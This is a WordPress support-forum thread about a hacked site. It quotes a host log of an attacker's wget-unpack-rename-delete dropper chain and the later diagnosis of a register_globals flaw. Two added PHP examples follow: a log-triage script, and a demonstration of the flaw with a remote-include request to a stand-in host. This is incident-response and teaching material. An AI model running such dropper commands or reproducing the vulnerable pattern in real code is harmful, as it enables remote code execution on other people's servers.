
Hacked (9 posts)

  1. ratinski
    Member
    Posted 8 years ago #

    I received the following email from my host today:

    We have found a vulnerable php script:

    server: server1.whitedns.com
    account: hyoutei
    domain: hyoutei.org
    called URL: http://hyoutei.org/index.php
    executed commands:
    cd /home/brillian/public_html/images ;wget
    [MOD: URL REMOVED] zxvf zclass.tgz;mv
    zclass.php z.php;rm -fr zclass.tgz

    They further stated that someone attempted to install malware, and showed me their server logs:

    Aug 13 04:28:13 server1 httpd: EW_EXEC_DENY: IP FILE(/home/hyoutei/public_html/index.php) EXEC(cd /home/brillian/public_html/images ;wget [ MOD: URL REMOVED ] zxvf zclass.tgz;mv zclass.php z.php;rm -fr zclass.tgz) URI(/)

    They told me to contact the developers/check support here at WordPress. Anyone have any advice? Please?
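    An added example, not part of the thread or of any hosting tool: a small PHP script that parses the EW_EXEC_DENY line quoted above and pulls out what a responder needs first, namely which PHP file spawned the shell, the command chain, and the request URI, then flags the download-and-cleanup sequence and the change into another account's home directory. The log line is copied from the post with the moderator's placeholder left in; the field layout (FILE(...) EXEC(...) URI(...)) is inferred from that one line, so the regular expression is an assumption, not the vendor's documented format.

```php
<?php
// Added example, not from the thread. Parses the EW_EXEC_DENY line the host
// sent and extracts the fields a responder wants first: which PHP file
// spawned the shell, the command chain, and the request URI. The log line is
// copied from the post, moderator placeholder included; the field layout is
// inferred from that single line, so treat the regex as an assumption.

$log_line = 'Aug 13 04:28:13 server1 httpd: EW_EXEC_DENY: IP FILE(/home/hyoutei/public_html/index.php)'
          . ' EXEC(cd /home/brillian/public_html/images ;wget [ MOD: URL REMOVED ] zxvf zclass.tgz;'
          . 'mv zclass.php z.php;rm -fr zclass.tgz) URI(/)';

function parse_exec_deny($line)
{
    // FILE(...) and URI(...) contain no ')' here; EXEC(...) might, so it is
    // matched greedily and anchored on the ' URI(' that follows it.
    $re = '/^(\w{3} +\d+ \d\d:\d\d:\d\d) (\S+) httpd: EW_EXEC_DENY: .*?'
        . 'FILE\(([^)]*)\) EXEC\((.*)\) URI\(([^)]*)\)$/';
    if (!preg_match($re, $line, $m)) {
        return null;
    }
    return array('time' => $m[1], 'host' => $m[2], 'file' => $m[3],
                 'exec' => $m[4], 'uri'  => $m[5]);
}

// First path component under /home/, i.e. the hosting account a path belongs to.
function home_user($path)
{
    return preg_match('#^/home/([^/]+)/#', $path, $m) ? $m[1] : null;
}

function triage(array $ev)
{
    $findings = array();
    $stages = array_map('trim', explode(';', $ev['exec']));
    $verbs = array();
    foreach ($stages as $s) {
        $parts = preg_split('/\s+/', $s);
        $verbs[] = $parts[0];
    }
    // fetch -> unpack -> rename -> delete archive is the usual dropper chain.
    if (array_intersect(array('wget', 'curl', 'fetch'), $verbs)) {
        $findings[] = 'remote download launched from a web-served PHP file';
    }
    if (in_array('rm', $verbs)) {
        $findings[] = 'dropped archive deleted afterwards (cleanup)';
    }
    // Account that owns the script versus the account whose directory the
    // chain cd's into: a mismatch means another customer on the box is a target.
    $owner = home_user($ev['file']);
    foreach ($stages as $s) {
        if (preg_match('/^cd\s+(\S+)/', $s, $m) && home_user($m[1]) !== $owner) {
            $findings[] = "cd into another account's home: $owner -> " . home_user($m[1]);
        }
    }
    return $findings;
}

$ev = parse_exec_deny($log_line);
if ($ev === null) {
    fwrite(STDERR, "unrecognised log format\n");
    exit(1);
}
printf("file %s, uri %s, %d stages\n", $ev['file'], $ev['uri'], count(explode(';', $ev['exec'])));
foreach (triage($ev) as $f) {
    echo " - $f\n";
}
```

    Run as a one-off with `php triage.php` on the saved line. Note what the parsed record does not tell you: index.php is the file that ran the command, not necessarily the file that was exploited, and URI(/) is the front page, so the entry vector has to come from the access logs for the same timestamp.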

  2. skippy
    Member
    Posted 8 years ago #

    I removed the URL to said malware. No sense showing other script kiddies where to find this junk.

    Tell us about your WordPress installation. What plugins did you use? How many authors did you have?

    Interesting to note that the perpetrator tried to change from your directory to a different user's home directory.

  3. userx
    Member
    Posted 8 years ago #

    <meta name="generator" content="WordPress 1.2" />

    - Would this be the problem?

  4. Mark (podz)
    Support Maven
    Posted 8 years ago #

    The URL above links to <meta name="generator" content="WordPress 1.5.1.3" />

  5. mpsmyth
    Member
    Posted 8 years ago #

    Could be the new vulnerability posted two days ago...

    http://secunia.com/advisories/16386/

  6. In regard to the security vulnerability that Mpsmyth posted, please read these:

    http://wordpress.org/support/topic/41774#post-234660

    http://wordpress.org/support/topic/41464#post-233351

  7. skippy
    Member
    Posted 8 years ago #

    I am in contact with ratinski, and working to determine how the attack occurred.

    Please remain calm. Getting alarmed and making wild speculation will do more harm than good. The information provided in the original post only shows what the perpetrator did once they had access. It does not show how that access was obtained. I have requested additional log data, and will review it as soon as I can.

    Until then, please remember to keep security in mind. Use strong passwords. Read up on hardening wordpress. Don't share your login details with anyone. Don't log into your blog from a public computer, or over an unsecured wireless network. Backup regularly.

  8. mpsmyth
    Member
    Posted 8 years ago #

    Thanks... I hadn't been able to find those with the search. Happy now.

  9. skippy
    Member
    Posted 8 years ago #

    After a review of the server logs, it seems pretty clear that the site was compromised by means of the register_globals vulnerability.

    perl and PHP code exists to automate the attack, allowing the attacker to run arbitrary code on the victim's account.

    I'm creating a new thread detailing this issue, and I'll probably make it sticky. Stay tuned.
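    The class of bug skippy names above, as an added example that is not WordPress code and is not the specific flaw in the Secunia advisory: a PHP script that copies request parameters into variables (what PHP's register_globals setting did, and what code that emulates it does) and then trusts a variable it never explicitly initialised. The variable name cache_file, the request, and the URL are made up for illustration; the hardened function shows the two fixes that remove the whole class, explicit initialisation and a whitelist instead of request-derived names.

```php
<?php
// Added example, not WordPress code. Shows the register_globals class of bug:
// request parameters become PHP variables, so an attacker can pre-set a
// variable the script only assigns conditionally, and that value reaches a
// dangerous sink (include, eval, unserialize). Names below are hypothetical.

// Constructed request, as if ?cache_file=http://evil.example/z.txt had been sent.
$_REQUEST = array('cache_file' => 'http://evil.example/z.txt');

// --- Vulnerable pattern ---------------------------------------------------
function vulnerable_load(array $request)
{
    // register_globals emulation: every request key becomes a variable.
    foreach ($request as $name => $value) {
        $$name = $value;
    }
    // The author expected $cache_file to be set only by the line below, but
    // guards it with empty(), so the attacker-supplied value survives.
    if (empty($cache_file)) {
        $cache_file = __DIR__ . '/cache/lastpost.php';
    }
    // Sink: include($cache_file) would, with allow_url_include on, fetch and
    // run remote code. The path is returned here so it can be inspected.
    return $cache_file;
}

// --- Hardened pattern -----------------------------------------------------
function hardened_load(array $request)
{
    // 1. Never turn request keys into variables; initialise unconditionally.
    $cache_file = __DIR__ . '/cache/lastpost.php';
    // 2. If the request may legitimately select a file, map a short key to a
    //    fixed path instead of accepting a path or URL from the client.
    $allowed = array('lastpost' => __DIR__ . '/cache/lastpost.php');
    if (isset($request['cache']) && isset($allowed[$request['cache']])) {
        $cache_file = $allowed[$request['cache']];
    }
    return $cache_file;
}

echo "vulnerable: " . vulnerable_load($_REQUEST) . "\n"; // http://evil.example/z.txt
echo "hardened:   " . hardened_load($_REQUEST) . "\n";   // <dir>/cache/lastpost.php
```

    The same check applies when auditing any old PHP code: grep for `extract($_`, `$$` applied to request keys, and `import_request_variables`, then look for variables that are only assigned inside `if (!isset(...))` or `if (empty(...))` blocks before being used in include, eval, or unserialize.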

Topic Closed

This topic has been closed to new replies.
